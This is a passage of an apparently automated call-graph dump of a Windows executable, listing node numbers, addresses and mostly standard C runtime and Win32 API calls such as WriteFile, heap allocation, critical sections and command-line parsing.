TranslateMessage DispatchMessageW GetMessageW 22413->22415 22414->22410 22415->22414 23136 42108f 23143 4253be 23136->23143 23139 4210a2 23141 41a506 __getptd_noexit 69 API calls 23139->23141 23142 4210ad 23141->23142 23156 4252e4 23143->23156 23145 421094 23145->23139 23146 425195 23145->23146 23147 4251a1 __calloc_impl 23146->23147 23148 41efa3 __lock 69 API calls 23147->23148 23150 4251ad 23148->23150 23149 425216 23197 42522b 23149->23197 23150->23149 23154 4251eb DeleteCriticalSection 23150->23154 23184 426fb6 23150->23184 23152 425222 __calloc_impl 23152->23139 23155 41a506 __getptd_noexit 69 API calls 23154->23155 23155->23150 23157 4252f0 __calloc_impl 23156->23157 23158 41efa3 __lock 69 API calls 23157->23158 23165 4252ff 23158->23165 23159 425397 23174 4253b5 23159->23174 23162 4253a3 __calloc_impl 23162->23145 23164 42529c 107 API calls __fflush_nolock 23164->23165 23165->23159 23165->23164 23166 4210f0 23165->23166 23171 425386 23165->23171 23167 421113 EnterCriticalSection 23166->23167 23168 4210fd 23166->23168 23167->23165 23169 41efa3 __lock 69 API calls 23168->23169 23170 421106 23169->23170 23170->23165 23177 42115e 23171->23177 23173 425394 23173->23165 23183 41eec9 LeaveCriticalSection 23174->23183 23176 4253bc 23176->23162 23178 421181 LeaveCriticalSection 23177->23178 23179 42116e 23177->23179 23178->23173 23182 41eec9 LeaveCriticalSection 23179->23182 23181 42117e 23181->23173 23182->23181 23183->23176 23185 426fc2 __calloc_impl 23184->23185 23186 426ff3 23185->23186 23187 426fd6 23185->23187 23196 426feb __calloc_impl 23186->23196 23200 4210af 23186->23200 23188 41edae __calloc_impl 69 API calls 23187->23188 23190 426fdb 23188->23190 23192 420103 __calloc_impl 7 API calls 23190->23192 23192->23196 23196->23150 23444 41eec9 LeaveCriticalSection 23197->23444 23199 425232 23199->23152 23201 4210e3 EnterCriticalSection 23200->23201 23202 4210c1 23200->23202 23205 4210d9 23201->23205 23202->23201 23203 4210c9 23202->23203 23204 41efa3 __lock 69 API calls 23203->23204 23204->23205 23206 426f3f 23205->23206 23207 426f53 23206->23207 23208 426f6f 23206->23208 23210 41edae __calloc_impl 69 API calls 23207->23210 23209 426f68 23208->23209 23225 425234 23208->23225 23222 42702a 23209->23222 23212 426f58 23210->23212 23214 420103 __calloc_impl 7 API calls 23212->23214 23214->23209 23220 426f8f 23220->23209 23221 41a506 __getptd_noexit 69 API calls 23220->23221 23221->23209 23437 421122 23222->23437 23224 427030 23224->23196 23226 42524d 23225->23226 23230 42526f 23225->23230 23227 424df7 __fileno 69 API calls 23226->23227 23226->23230 23228 425268 23227->23228 23264 424c6e 23228->23264 23231 4291a9 23230->23231 23232 426f83 23231->23232 23233 4291b9 23231->23233 23235 424df7 23232->23235 23233->23232 23234 41a506 __getptd_noexit 69 API calls 23233->23234 23234->23232 23236 424e06 23235->23236 23238 424e1b 23235->23238 23237 41edae __calloc_impl 69 API calls 23236->23237 23239 424e0b 23237->23239 23241 4271af 23238->23241 23240 420103 __calloc_impl 7 API calls 23239->23240 23240->23238 23242 4271bb __calloc_impl 23241->23242 23243 4271c3 23242->23243 23244 4271de 23242->23244 23245 41edc1 __locking 69 API calls 23243->23245 23246 4271ec 23244->23246 23249 42722d 23244->23249 23247 4271c8 23245->23247 23248 41edc1 __locking 69 API calls 23246->23248 23250 41edae __calloc_impl 69 API calls 23247->23250 23251 4271f1 23248->23251 23252 426846 ___lock_fhandle 70 API calls 23249->23252 23259 4271d0 __calloc_impl 23250->23259 23253 41edae __calloc_impl 69 API calls 23251->23253 23255 427233 23252->23255 23254 4271f8 23253->23254 23256 420103 __calloc_impl 7 API calls 23254->23256 23257 427240 23255->23257 23258 42724e 23255->23258 23256->23259 23409 427113 23257->23409 23261 41edae __calloc_impl 69 API calls 23258->23261 23259->23220 23262 427248 23261->23262 23424 427272 23262->23424 23265 424c7a __calloc_impl 23264->23265 23266 424c82 23265->23266 23267 424c9d 23265->23267 23289 41edc1 23266->23289 23268 424cab 23267->23268 23274 424cec 23267->23274 23270 41edc1 __locking 69 API calls 23268->23270 23273 424cb0 23270->23273 23272 41edae __calloc_impl 69 API calls 23284 424c8f __calloc_impl 23272->23284 23275 41edae __calloc_impl 69 API calls 23273->23275 23292 426846 23274->23292 23277 424cb7 23275->23277 23281 420103 __calloc_impl 7 API calls 23277->23281 23278 424cf2 23279 424d15 23278->23279 23280 424cff 23278->23280 23283 41edae __calloc_impl 69 API calls 23279->23283 23302 42453b 23280->23302 23281->23284 23286 424d1a 23283->23286 23284->23230 23285 424d0d 23361 424d40 23285->23361 23287 41edc1 __locking 69 API calls 23286->23287 23287->23285 23290 41e93b __getptd_noexit 69 API calls 23289->23290 23291 41edc6 23290->23291 23291->23272 23293 426852 __calloc_impl 23292->23293 23294 4268ad 23293->23294 23297 41efa3 __lock 69 API calls 23293->23297 23295 4268b2 EnterCriticalSection 23294->23295 23296 4268cf __calloc_impl 23294->23296 23295->23296 23296->23278 23298 42687e 23297->23298 23299 426895 23298->23299 23301 4241e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 23298->23301 23364 4268dd 23299->23364 23301->23299 23303 42454a __write_nolock 23302->23303 23304 4245a3 23303->23304 23305 42457c 23303->23305 23335 424571 23303->23335 23310 42460b 23304->23310 23311 4245e5 23304->23311 23307 41edc1 __locking 69 API calls 23305->23307 23306 41e6de __write_nolock 5 API calls 23308 424c6c 23306->23308 23309 424581 23307->23309 23308->23285 23314 41edae __calloc_impl 69 API calls 23309->23314 23313 42461f 23310->23313 23368 42439d 23310->23368 23312 41edc1 __locking 69 API calls 23311->23312 23315 4245ea 23312->23315 23378 424d93 23313->23378 23317 424588 23314->23317 23319 41edae __calloc_impl 69 API calls 23315->23319 23320 420103 __calloc_impl 7 API calls 23317->23320 23322 4245f3 23319->23322 23320->23335 23321 42462a 23323 4248d0 23321->23323 23327 41e9b4 __getptd 69 API calls 23321->23327 23324 420103 __calloc_impl 7 API calls 23322->23324 23325 4248e0 23323->23325 23326 424b9f WriteFile 23323->23326 23324->23335 23330 4249be 23325->23330 23336 4248f4 23325->23336 23329 424bd2 GetLastError 23326->23329 23353 4248b2 23326->23353 23328 424645 GetConsoleMode 23327->23328 23328->23323 23331 424670 23328->23331 23329->23353 23332 4249cd 23330->23332 23342 424a9e 23330->23342 23331->23323 23334 424682 GetConsoleCP 23331->23334 23333 424c1d 23332->23333 23345 424a42 WriteFile 23332->23345 23332->23353 23333->23335 23337 41edae __calloc_impl 69 API calls 23333->23337 23334->23353 23359 4246a5 23334->23359 23335->23306 23336->23333 23339 424962 WriteFile 23336->23339 23336->23353 23340 424c40 23337->23340 23338 424bf0 23343 424bfb 23338->23343 23344 424c0f 23338->23344 23339->23329 23339->23336 23347 41edc1 __locking 69 API calls 23340->23347 23341 424b04 WideCharToMultiByte 23341->23329 23349 424b3b WriteFile 23341->23349 23342->23333 23342->23341 23342->23349 23342->23353 23348 41edae __calloc_impl 69 API calls 23343->23348 23390 41edd4 23344->23390 23345->23329 23345->23332 23347->23335 23351 424c00 23348->23351 23349->23342 23350 424b72 GetLastError 23349->23350 23350->23342 23354 41edc1 __locking 69 API calls 23351->23354 23353->23333 23353->23335 23353->23338 23354->23335 23355 4250e5 81 API calls __fassign 23355->23359 23356 42690d 11 API calls __putwch_nolock 23356->23359 23357 424751 WideCharToMultiByte 23357->23353 23358 424782 WriteFile 23357->23358 23358->23329 23358->23359 23359->23329 23359->23353 23359->23355 23359->23356 23359->23357 23360 4247d6 WriteFile 23359->23360 23387 4227cb 23359->23387 23360->23329 23360->23359 23408 4268e6 LeaveCriticalSection 23361->23408 23363 424d48 23363->23284 23367 41eec9 LeaveCriticalSection 23364->23367 23366 4268e4 23366->23294 23367->23366 23395 4267cf 23368->23395 23370 4243bb 23371 4243c3 23370->23371 23372 4243d4 SetFilePointer 23370->23372 23373 41edae __calloc_impl 69 API calls 23371->23373 23374 4243ec GetLastError 23372->23374 23375 4243c8 23372->23375 23373->23375 23374->23375 23376 4243f6 23374->23376 23375->23313 23377 41edd4 __dosmaperr 69 API calls 23376->23377 23377->23375 23379 424da0 23378->23379 23380 424daf 23378->23380 23381 41edae __calloc_impl 69 API calls 23379->23381 23383 424dd3 23380->23383 23384 41edae __calloc_impl 69 API calls 23380->23384 23382 424da5 23381->23382 23382->23321 23383->23321 23385 424dc3 23384->23385 23386 420103 __calloc_impl 7 API calls 23385->23386 23386->23383 23388 422793 __isleadbyte_l 79 API calls 23387->23388 23389 4227da 23388->23389 23389->23359 23391 41edc1 __locking 69 API calls 23390->23391 23392 41eddf __dosmaperr 23391->23392 23393 41edae __calloc_impl 69 API calls 23392->23393 23394 41edf2 23393->23394 23394->23335 23396 4267f4 23395->23396 23397 4267dc 23395->23397 23399 41edc1 __locking 69 API calls 23396->23399 23404 426839 23396->23404 23398 41edc1 __locking 69 API calls 23397->23398 23400 4267e1 23398->23400 23401 426822 23399->23401 23402 41edae __calloc_impl 69 API calls 23400->23402 23403 41edae __calloc_impl 69 API calls 23401->23403 23405 4267e9 23402->23405 23406 426829 23403->23406 23404->23370 23405->23370 23407 420103 __calloc_impl 7 API calls 23406->23407 23407->23404 23408->23363 23410 4267cf __commit 69 API calls 23409->23410 23413 427123 23410->23413 23411 427179 23427 426749 23411->23427 23413->23411 23414 427157 23413->23414 23417 4267cf __commit 69 API calls 23413->23417 23414->23411 23415 4267cf __commit 69 API calls 23414->23415 23418 427163 CloseHandle 23415->23418 23420 42714e 23417->23420 23418->23411 23421 42716f GetLastError 23418->23421 23419 4271a3 23419->23262 23423 4267cf __commit 69 API calls 23420->23423 23421->23411 23422 41edd4 __dosmaperr 69 API calls 23422->23419 23423->23414 23436 4268e6 LeaveCriticalSection 23424->23436 23426 42727a 23426->23259 23428 4267b5 23427->23428 23429 42675a 23427->23429 23430 41edae __calloc_impl 69 API calls 23428->23430 23429->23428 23434 426785 23429->23434 23431 4267ba 23430->23431 23432 41edc1 __locking 69 API calls 23431->23432 23433 4267ab 23432->23433 23433->23419 23433->23422 23434->23433 23435 4267a5 SetStdHandle 23434->23435 23435->23433 23436->23426 23438 421152 LeaveCriticalSection 23437->23438 23439 421133 23437->23439 23438->23224 23439->23438 23440 42113a 23439->23440 23443 41eec9 LeaveCriticalSection 23440->23443 23442 42114f 23442->23224 23443->23442 23444->23199 22702 41c618 22703 41c631 22702->22703 22704 41c63c 22702->22704 22707 41ec8a 22704->22707 22706 41c641 __calloc_impl 22708 41ec96 __calloc_impl 22707->22708 22709 41e9b4 __getptd 69 API calls 22708->22709 22710 41ec9b 22709->22710 22713 423f89 22710->22713 22712 41ecbd __calloc_impl 22712->22706 22714 423fa8 22713->22714 22717 423faf 22713->22717 22715 42179d __NMSG_WRITE 69 API calls 22714->22715 22715->22717 22725 42553a 22717->22725 22719 423fc0 _memset 22721 424098 22719->22721 22723 424058 SetUnhandledExceptionFilter UnhandledExceptionFilter 22719->22723 22749 42171b 22721->22749 22723->22721 22726 41e768 __decode_pointer 7 API calls 22725->22726 22727 423fb5 22726->22727 22727->22719 22728 425547 22727->22728 22731 425553 __calloc_impl 22728->22731 22729 4255af 22730 425590 22729->22730 22735 4255be 22729->22735 22734 41e768 __decode_pointer 7 API calls 22730->22734 22731->22729 22731->22730 22732 42557a 22731->22732 22738 425576 22731->22738 22733 41e93b __getptd_noexit 69 API calls 22732->22733 22736 42557f _siglookup 22733->22736 22734->22736 22737 41edae __calloc_impl 69 API calls 22735->22737 22740 425625 22736->22740 22742 42171b _abort 69 API calls 22736->22742 22748 425588 __calloc_impl 22736->22748 22739 4255c3 22737->22739 22738->22732 22738->22735 22741 420103 __calloc_impl 7 API calls 22739->22741 22743 41efa3 __lock 69 API calls 22740->22743 22745 425630 22740->22745 22741->22748 22742->22740 22743->22745 22744 41e75f _doexit 7 API calls 22746 425665 22744->22746 22745->22744 22745->22746 22752 4256bb 22746->22752 22748->22719 22750 4215d9 _doexit 69 API calls 22749->22750 22751 42172c RtlUnwind 22750->22751 22751->22712 22753 4256c1 22752->22753 22754 4256c8 22752->22754 22756 41eec9 LeaveCriticalSection 22753->22756 22754->22748 22756->22754 19386 41d89d 19425 41fa9c 19386->19425 19388 41d8a9 GetStartupInfoA 19389 41d8cc 19388->19389 19426 41edf7 HeapCreate 19389->19426 19392 41d91c 19428 41eafd GetModuleHandleW 19392->19428 19396 41d874 _fast_error_exit 69 API calls 19397 41d92d __RTC_Initialize 19396->19397 19462 423b05 19397->19462 19399 41d93b 19400 41d947 GetCommandLineA 19399->19400 19401 421495 __amsg_exit 69 API calls 19399->19401 19477 4239ce 19400->19477 19403 41d946 19401->19403 19403->19400 19407 41d96c 19513 42369b 19407->19513 19408 421495 __amsg_exit 69 API calls 19408->19407 19411 41d97d 19528 421554 19411->19528 19412 421495 __amsg_exit 69 API calls 19412->19411 19414 41d984 19415 41d98f 19414->19415 19417 421495 __amsg_exit 69 API calls 19414->19417 19534 42363c 19415->19534 19417->19415 19425->19388 19427 41d910 19426->19427 19427->19392 19585 41d874 19427->19585 19429 41eb11 19428->19429 19430 41eb18 19428->19430 19599 421465 19429->19599 19432 41ec80 19430->19432 19433 41eb22 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 19430->19433 19638 41e817 19432->19638 19436 41eb6b TlsAlloc 19433->19436 19438 41d922 19436->19438 19439 41ebb9 TlsSetValue 19436->19439 19438->19396 19438->19397 19439->19438 19440 41ebca 19439->19440 19603 42174f 19440->19603 19443 41e6ed __encode_pointer 7 API calls 19444 41ebda 19443->19444 19445 41e6ed __encode_pointer 7 API calls 19444->19445 19446 41ebea 19445->19446 19447 41e6ed __encode_pointer 7 API calls 19446->19447 19448 41ebfa 19447->19448 19449 41e6ed __encode_pointer 7 API calls 19448->19449 19450 41ec0a 19449->19450 19610 41ee27 19450->19610 19453 41e768 __decode_pointer 7 API calls 19454 41ec2b 19453->19454 19454->19432 19614 421328 19454->19614 19457 41e768 __decode_pointer 7 API calls 19458 41ec5e 19457->19458 19458->19432 19459 41ec65 19458->19459 19620 41e854 19459->19620 19461 41ec6d GetCurrentThreadId 19461->19438 19690 41fa9c 19462->19690 19464 423b11 GetStartupInfoA 19465 421328 __calloc_crt 69 API calls 19464->19465 19466 423b32 19465->19466 19467 423d50 __calloc_impl 19466->19467 19470 421328 __calloc_crt 69 API calls 19466->19470 19472 423c97 19466->19472 19474 423c1a 19466->19474 19467->19399 19468 423ccd GetStdHandle 19468->19472 19469 423d32 SetHandleCount 19469->19467 19470->19466 19471 423cdf GetFileType 19471->19472 19472->19467 19472->19468 19472->19469 19472->19471 19475 4241e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 19472->19475 19473 423c43 GetFileType 19473->19474 19474->19467 19474->19472 19474->19473 19476 4241e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 19474->19476 19475->19472 19476->19474 19478 4239ec GetEnvironmentStringsW 19477->19478 19481 423a0b 19477->19481 19479 4239f4 19478->19479 19480 423a00 GetLastError 19478->19480 19482 423a36 WideCharToMultiByte 19479->19482 19483 423a27 GetEnvironmentStringsW 19479->19483 19480->19481 19481->19479 19484 423aa4 19481->19484 19489 423a6a 19482->19489 19490 423a99 FreeEnvironmentStringsW 19482->19490 19483->19482 19486 41d957 19483->19486 19485 423aad GetEnvironmentStrings 19484->19485 19484->19486 19485->19486 19487 423abd 19485->19487 19502 423913 19486->19502 19491 4212e3 __malloc_crt 69 API calls 19487->19491 19492 4212e3 __malloc_crt 69 API calls 19489->19492 19490->19486 19493 423ad7 19491->19493 19494 423a70 19492->19494 19495 423aea _realloc 19493->19495 19496 423ade FreeEnvironmentStringsA 19493->19496 19494->19490 19497 423a78 WideCharToMultiByte 19494->19497 19500 423af4 FreeEnvironmentStringsA 19495->19500 19496->19486 19498 423a92 19497->19498 19499 423a8a 19497->19499 19498->19490 19501 41a506 __getptd_noexit 69 API calls 19499->19501 19500->19486 19501->19498 19503 423928 19502->19503 19504 42392d GetModuleFileNameA 19502->19504 19697 422046 19503->19697 19505 423954 19504->19505 19691 423779 19505->19691 19508 41d961 19508->19407 19508->19408 19510 4212e3 __malloc_crt 69 API calls 19511 423996 19510->19511 19511->19508 19512 423779 _parse_cmdline 79 API calls 19511->19512 19512->19508 19514 4236a4 19513->19514 19516 4236a9 _strlen 19513->19516 19515 422046 ___initmbctable 113 API calls 19514->19515 19515->19516 19517 421328 __calloc_crt 69 API calls 19516->19517 19520 41d972 19516->19520 19523 4236de _strlen 19517->19523 19518 42373c 19519 41a506 __getptd_noexit 69 API calls 19518->19519 19519->19520 19520->19411 19520->19412 19521 421328 __calloc_crt 69 API calls 19521->19523 19522 423762 19524 41a506 __getptd_noexit 69 API calls 19522->19524 19523->19518 19523->19520 19523->19521 19523->19522 19525 422896 _strcpy_s 69 API calls 19523->19525 19526 423723 19523->19526 19524->19520 19525->19523 19526->19523 19527 41ffdb __invoke_watson 10 API calls 19526->19527 19527->19526 19530 421562 __IsNonwritableInCurrentImage 19528->19530 20127 4233d9 19530->20127 19531 421580 __initterm_e 19532 41c9cf __cinit 76 API calls 19531->19532 19533 42159f __IsNonwritableInCurrentImage __initterm 19531->19533 19532->19533 19533->19414 19535 42364a 19534->19535 19538 42364f 19534->19538 19536 422046 ___initmbctable 113 API calls 19535->19536 19536->19538 19537 41d995 19540 40fef0 19537->19540 19538->19537 19539 426731 __wincmdln 79 API calls 19538->19539 19539->19538 20131 410e1c GetModuleHandleW 19540->20131 19544 40ff16 _memset 19545 40ff27 GetCommandLineW 19544->19545 19546 40ffa2 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 19545->19546 19547 40ff36 19545->19547 20149 40bc16 19546->20149 20138 40d64b 19547->20138 19553 40ff44 OpenFileMappingW 19557 40ff91 CloseHandle 19553->19557 19558 40ff5d MapViewOfFile 19553->19558 19554 40ff9c 20145 40d5f7 SetEnvironmentVariableW 19554->20145 19556 410051 20153 40c3a8 19556->20153 19557->19546 19560 40ff8a UnmapViewOfFile 19558->19560 19561 40ff6e _realloc 19558->19561 19560->19557 19563 40d5f7 2 API calls 19561->19563 19562 41005c 20158 419dd0 19562->20158 19563->19560 19566 419dd0 3 API calls 19567 41007d DialogBoxParamW 19566->19567 19568 4100b7 19567->19568 20162 41a0ba 19568->20162 19586 41d882 19585->19586 19587 41d887 19585->19587 19588 421948 __FF_MSGBANNER 69 API calls 19586->19588 19589 42179d __NMSG_WRITE 69 API calls 19587->19589 19588->19587 19590 41d88f 19589->19590 19591 4214e9 _malloc 3 API calls 19590->19591 19592 41d899 19591->19592 19592->19392 19600 421470 Sleep GetModuleHandleW 19599->19600 19601 41eb17 19600->19601 19602 42148e 19600->19602 19601->19430 19602->19600 19602->19601 19604 41e75f _doexit 7 API calls 19603->19604 19605 421757 __init_pointers __initp_misc_winsig 19604->19605 19649 41ed0e 19605->19649 19608 41e6ed __encode_pointer 7 API calls 19609 41ebcf 19608->19609 19609->19443 19611 41ee32 19610->19611 19612 4241e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 19611->19612 19613 41ec17 19611->19613 19612->19611 19613->19432 19613->19453 19616 421331 19614->19616 19617 41ec44 19616->19617 19618 42134f Sleep 19616->19618 19652 4253c7 19616->19652 19617->19432 19617->19457 19619 421364 19618->19619 19619->19616 19619->19617 19669 41fa9c 19620->19669 19622 41e860 GetModuleHandleW 19623 41e870 19622->19623 19624 41e876 19622->19624 19625 421465 __crt_waiting_on_module_handle 2 API calls 19623->19625 19626 41e8b2 19624->19626 19627 41e88e GetProcAddress GetProcAddress 19624->19627 19625->19624 19628 41efa3 __lock 65 API calls 19626->19628 19627->19626 19629 41e8d1 InterlockedIncrement 19628->19629 19670 41e929 19629->19670 19632 41efa3 __lock 65 API calls 19633 41e8f2 19632->19633 19673 4221ad InterlockedIncrement 19633->19673 19635 41e910 19685 41e932 19635->19685 19637 41e91d __calloc_impl 19637->19461 19639 41e821 19638->19639 19640 41e82d 19638->19640 19641 41e768 __decode_pointer 7 API calls 19639->19641 19642 41e841 TlsFree 19640->19642 19643 41e84f 19640->19643 19641->19640 19642->19643 19644 41ee8e DeleteCriticalSection 19643->19644 19646 41eea6 19643->19646 19645 41a506 __getptd_noexit 69 API calls 19644->19645 19645->19643 19647 41eeb8 DeleteCriticalSection 19646->19647 19648 41eec6 19646->19648 19647->19646 19648->19438 19650 41e6ed __encode_pointer 7 API calls 19649->19650 19651 41ed18 19650->19651 19651->19608 19653 4253d3 __calloc_impl 19652->19653 19654 4253eb 19653->19654 19664 42540a _memset 19653->19664 19655 41edae __calloc_impl 68 API calls 19654->19655 19656 4253f0 19655->19656 19657 420103 __calloc_impl 7 API calls 19656->19657 19660 425400 __calloc_impl 19657->19660 19658 42547c RtlAllocateHeap 19658->19664 19659 41efa3 __lock 68 API calls 19659->19664 19660->19616 19661 41fc9b __calloc_impl 7 API calls 19661->19664 19662 41f7b5 ___sbh_alloc_block 5 API calls 19662->19664 19664->19658 19664->19659 19664->19660 19664->19661 19664->19662 19665 4254c3 19664->19665 19668 41eec9 LeaveCriticalSection 19665->19668 19667 4254ca 19667->19664 19668->19667 19669->19622 19688 41eec9 LeaveCriticalSection 19670->19688 19672 41e8eb 19672->19632 19674 4221cb InterlockedIncrement 19673->19674 19675 4221ce 19673->19675 19674->19675 19676 4221db 19675->19676 19677 4221d8 InterlockedIncrement 19675->19677 19678 4221e5 InterlockedIncrement 19676->19678 19679 4221e8 19676->19679 19677->19676 19678->19679 19680 4221f2 InterlockedIncrement 19679->19680 19682 4221f5 19679->19682 19680->19682 19681 42220e InterlockedIncrement 19681->19682 19682->19681 19683 42221e InterlockedIncrement 19682->19683 19684 422229 InterlockedIncrement 19682->19684 19683->19682 19684->19635 19689 41eec9 LeaveCriticalSection 19685->19689 19687 41e939 19687->19637 19688->19672 19689->19687 19690->19464 19693 423798 19691->19693 19695 423805 19693->19695 19701 426731 19693->19701 19694 423903 19694->19508 19694->19510 19695->19694 19696 426731 79 API calls __wincmdln 19695->19696 19696->19695 19698 422056 19697->19698 19699 42204f 19697->19699 19698->19504 19942 421eac 19699->19942 19704 4266de 19701->19704 19707 41d0c8 19704->19707 19708 41d0db 19707->19708 19714 41d128 19707->19714 19715 41e9b4 19708->19715 19711 41d108 19711->19714 19735 421ba7 19711->19735 19714->19693 19751 41e93b GetLastError 19715->19751 19717 41e9bc 19718 41d0e0 19717->19718 19719 421495 __amsg_exit 69 API calls 19717->19719 19718->19711 19720 422313 19718->19720 19719->19718 19721 42231f __calloc_impl 19720->19721 19722 41e9b4 __getptd 69 API calls 19721->19722 19723 422324 19722->19723 19724 422352 19723->19724 19726 422336 19723->19726 19725 41efa3 __lock 69 API calls 19724->19725 19727 422359 19725->19727 19728 41e9b4 __getptd 69 API calls 19726->19728 19770 4222d5 19727->19770 19730 42233b 19728->19730 19733 422349 __calloc_impl 19730->19733 19734 421495 __amsg_exit 69 API calls 19730->19734 19733->19711 19734->19733 19736 421bb3 __calloc_impl 19735->19736 19737 41e9b4 __getptd 69 API calls 19736->19737 19738 421bb8 19737->19738 19739 41efa3 __lock 69 API calls 19738->19739 19740 421bca 19738->19740 19741 421be8 19739->19741 19744 421495 __amsg_exit 69 API calls 19740->19744 19747 421bd8 __calloc_impl 19740->19747 19742 421c31 19741->19742 19745 421c19 InterlockedIncrement 19741->19745 19746 421bff InterlockedDecrement 19741->19746 19938 421c42 19742->19938 19744->19747 19745->19742 19746->19745 19748 421c0a 19746->19748 19747->19714 19748->19745 19749 41a506 __getptd_noexit 69 API calls 19748->19749 19750 421c18 19749->19750 19750->19745 19765 41e7e3 TlsGetValue 19751->19765 19753 41e9a8 SetLastError 19753->19717 19755 421328 __calloc_crt 66 API calls 19756 41e966 19755->19756 19756->19753 19757 41e768 __decode_pointer 7 API calls 19756->19757 19758 41e980 19757->19758 19759 41e987 19758->19759 19760 41e99f 19758->19760 19761 41e854 __getptd_noexit 66 API calls 19759->19761 19762 41a506 __getptd_noexit 66 API calls 19760->19762 19763 41e98f GetCurrentThreadId 19761->19763 19764 41e9a5 19762->19764 19763->19753 19764->19753 19766 41e813 19765->19766 19767 41e7f8 19765->19767 19766->19753 19766->19755 19768 41e768 __decode_pointer 7 API calls 19767->19768 19769 41e803 TlsSetValue 19768->19769 19769->19766 19771 4222d9 19770->19771 19777 42230b 19770->19777 19772 4221ad ___addlocaleref 8 API calls 19771->19772 19771->19777 19773 4222ec 19772->19773 19773->19777 19781 42223c 19773->19781 19778 42237d 19777->19778 19937 41eec9 LeaveCriticalSection 19778->19937 19780 422384 19780->19730 19782 4222d0 19781->19782 19783 42224d InterlockedDecrement 19781->19783 19782->19777 19795 422064 19782->19795 19784 422262 InterlockedDecrement 19783->19784 19785 422265 19783->19785 19784->19785 19786 422272 19785->19786 19787 42226f InterlockedDecrement 19785->19787 19788 42227f 19786->19788 19789 42227c InterlockedDecrement 19786->19789 19787->19786 19790 422289 InterlockedDecrement 19788->19790 19791 42228c 19788->19791 19789->19788 19790->19791 19792 4222a5 InterlockedDecrement 19791->19792 19793 4222c0 InterlockedDecrement 19791->19793 19794 4222b5 InterlockedDecrement 19791->19794 19792->19791 19793->19782 19794->19791 19796 4220e8 19795->19796 19800 42207b 19795->19800 19797 422135 19796->19797 19798 41a506 __getptd_noexit 69 API calls 19796->19798 19814 42215c 19797->19814 19849 425bee 19797->19849 19802 422109 19798->19802 19799 4220af 19803 4220d0 19799->19803 19811 41a506 __getptd_noexit 69 API calls 19799->19811 19800->19796 19800->19799 19809 41a506 __getptd_noexit 69 API calls 19800->19809 19804 41a506 __getptd_noexit 69 API calls 19802->19804 19807 41a506 __getptd_noexit 69 API calls 19803->19807 19806 42211c 19804->19806 19813 41a506 __getptd_noexit 69 API calls 19806->19813 19815 4220dd 19807->19815 19808 4221a1 19816 41a506 __getptd_noexit 69 API calls 19808->19816 19817 4220a4 19809->19817 19810 41a506 __getptd_noexit 69 API calls 19810->19814 19818 4220c5 19811->19818 19812 41a506 69 API calls __getptd_noexit 19812->19814 19819 42212a 19813->19819 19814->19808 19814->19812 19820 41a506 __getptd_noexit 69 API calls 19815->19820 19821 4221a7 19816->19821 19825 425dc8 19817->19825 19841 425d83 19818->19841 19824 41a506 __getptd_noexit 69 API calls 19819->19824 19820->19796 19821->19777 19824->19797 19826 425e52 19825->19826 19827 425dd5 19825->19827 19826->19799 19828 425de6 19827->19828 19829 41a506 __getptd_noexit 69 API calls 19827->19829 19830 425df8 19828->19830 19831 41a506 __getptd_noexit 69 API calls 19828->19831 19829->19828 19832 425e0a 19830->19832 19833 41a506 __getptd_noexit 69 API calls 19830->19833 19831->19830 19834 425e1c 19832->19834 19836 41a506 __getptd_noexit 69 API calls 19832->19836 19833->19832 19835 425e2e 19834->19835 19837 41a506 __getptd_noexit 69 API calls 19834->19837 19838 425e40 19835->19838 19839 41a506 __getptd_noexit 69 API calls 19835->19839 19836->19834 19837->19835 19838->19826 19840 41a506 __getptd_noexit 69 API calls 19838->19840 19839->19838 19840->19826 19842 425d90 19841->19842 19843 425dc4 19841->19843 19844 425da0 19842->19844 19845 41a506 __getptd_noexit 69 API calls 19842->19845 19843->19803 19846 425db2 19844->19846 19847 41a506 __getptd_noexit 69 API calls 19844->19847 19845->19844 19846->19843 19848 41a506 __getptd_noexit 69 API calls 19846->19848 19847->19846 19848->19843 19850 422155 19849->19850 19851 425bff 19849->19851 19850->19810 19852 41a506 __getptd_noexit 69 API calls 19851->19852 19853 425c07 19852->19853 19854 41a506 __getptd_noexit 69 API calls 19853->19854 19855 425c0f 19854->19855 19856 41a506 __getptd_noexit 69 API calls 19855->19856 19857 425c17 19856->19857 19858 41a506 __getptd_noexit 69 API calls 19857->19858 19859 425c1f 19858->19859 19860 41a506 __getptd_noexit 69 API calls 19859->19860 19861 425c27 19860->19861 19862 41a506 __getptd_noexit 69 API calls 19861->19862 19863 425c2f 19862->19863 19864 41a506 __getptd_noexit 69 API calls 19863->19864 19865 425c36 19864->19865 19866 41a506 __getptd_noexit 69 API calls 19865->19866 19867 425c3e 19866->19867 19868 41a506 __getptd_noexit 69 API calls 19867->19868 19869 425c46 19868->19869 19870 41a506 __getptd_noexit 69 API calls 19869->19870 19871 425c4e 19870->19871 19872 41a506 __getptd_noexit 69 API calls 19871->19872 19873 425c56 19872->19873 19874 41a506 __getptd_noexit 69 API calls 19873->19874 19937->19780 19941 41eec9 LeaveCriticalSection 19938->19941 19940 421c49 19940->19740 19941->19940 19943 421eb8 __calloc_impl 19942->19943 19944 41e9b4 __getptd 69 API calls 19943->19944 19945 421ec1 19944->19945 19946 421ba7 __setmbcp 71 API calls 19945->19946 19947 421ecb 19946->19947 19973 421c4b 19947->19973 19950 4212e3 __malloc_crt 69 API calls 19951 421eec 19950->19951 19952 42200b __calloc_impl 19951->19952 19980 421cc7 19951->19980 19952->19698 19955 422018 19955->19952 19959 42202b 19955->19959 19961 41a506 __getptd_noexit 69 API calls 19955->19961 19956 421f1c InterlockedDecrement 19957 421f2c 19956->19957 19958 421f3d InterlockedIncrement 19956->19958 19957->19958 19963 41a506 __getptd_noexit 69 API calls 19957->19963 19958->19952 19960 421f53 19958->19960 19962 41edae __calloc_impl 69 API calls 19959->19962 19960->19952 19964 41efa3 __lock 69 API calls 19960->19964 19961->19959 19962->19952 19965 421f3c 19963->19965 19967 421f67 InterlockedDecrement 19964->19967 19965->19958 19968 421fe3 19967->19968 19969 421ff6 InterlockedIncrement 19967->19969 19968->19969 19971 41a506 __getptd_noexit 69 API calls 19968->19971 19990 42200d 19969->19990 19972 421ff5 19971->19972 19972->19969 19974 41d0c8 _LocaleUpdate::_LocaleUpdate 79 API calls 19973->19974 19975 421c5f 19974->19975 19976 421c6a GetOEMCP 19975->19976 19977 421c88 19975->19977 19979 421c7a 